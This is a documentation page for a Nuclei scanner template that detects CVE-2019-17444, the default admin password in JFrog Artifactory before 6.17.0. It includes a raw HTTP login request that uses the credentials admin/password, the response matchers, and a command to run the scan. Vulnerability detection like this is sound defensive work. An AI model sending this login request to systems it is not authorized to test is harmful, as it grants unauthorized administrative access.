Skip to content
Nuclei Templates

Jfrog Artifactory <6.17.0 - Default Admin Password

ID: CVE-2019-17444

Severity: critical

Author: pdteam

Tags: cve,cve2019,jfrog,default-login,-

Description

Section titled “Description”

Jfrog Artifactory prior to 6.17.0 uses default passwords (such as “password”) for administrative accounts and does not require users to change them. This may allow unauthorized network-based attackers to completely compromise of Jfrog Artifactory.

YAML Source

Section titled “YAML Source”
id: CVE-2019-17444


info:
  name: Jfrog Artifactory <6.17.0 - Default Admin Password
  author: pdteam
  severity: critical
  description: |
    Jfrog Artifactory prior to 6.17.0 uses default passwords (such as "password") for administrative accounts and does not require users to change them. This may allow unauthorized network-based attackers to completely compromise of Jfrog Artifactory.
  impact: |
    An attacker can gain unauthorized access to the Jfrog Artifactory instance.
  remediation: |
    Upgrade Jfrog Artifactory to version 6.17.0 or later and change the default admin password to a strong, unique one.
  reference:
    - https://www.jfrog.com/confluence/display/JFROG/Artifactory+Release+Notes
    - https://www.jfrog.com/confluence/display/JFROG/JFrog+Artifactory
    - https://nvd.nist.gov/vuln/detail/CVE-2019-17444
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-17444
    cwe-id: CWE-521
    epss-score: 0.05344
    epss-percentile: 0.93079
    cpe: cpe:2.3:a:jfrog:artifactory:*:*:*:*:*:-:*:*
  metadata:
    max-request: 1
    vendor: jfrog
    product: artifactory
    framework: "-"
    shodan-query: cpe:"cpe:2.3:a:jfrog:artifactory"
  tags: cve,cve2019,jfrog,default-login,-


http:
  - raw:
      - |
        POST /ui/api/v1/ui/auth/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json;charset=UTF-8
        X-Requested-With: XMLHttpRequest
        Origin: {{RootURL}}


        {"user":"admin","password":"password","type":"login"}


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"name":"admin"'
          - '"admin":true'
        condition: and


      - type: status
        status:
          - 200
# digest: 4a0a004730450220539cc1481730dcb8f1a902b778b108cd75fe2a1e30416e9eecbbb3481194c7020221009ed0b9122f8935111cc71bbae4c5daf44ef899717a521d4244758486bc108fc3:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-17444.yaml"

View on Github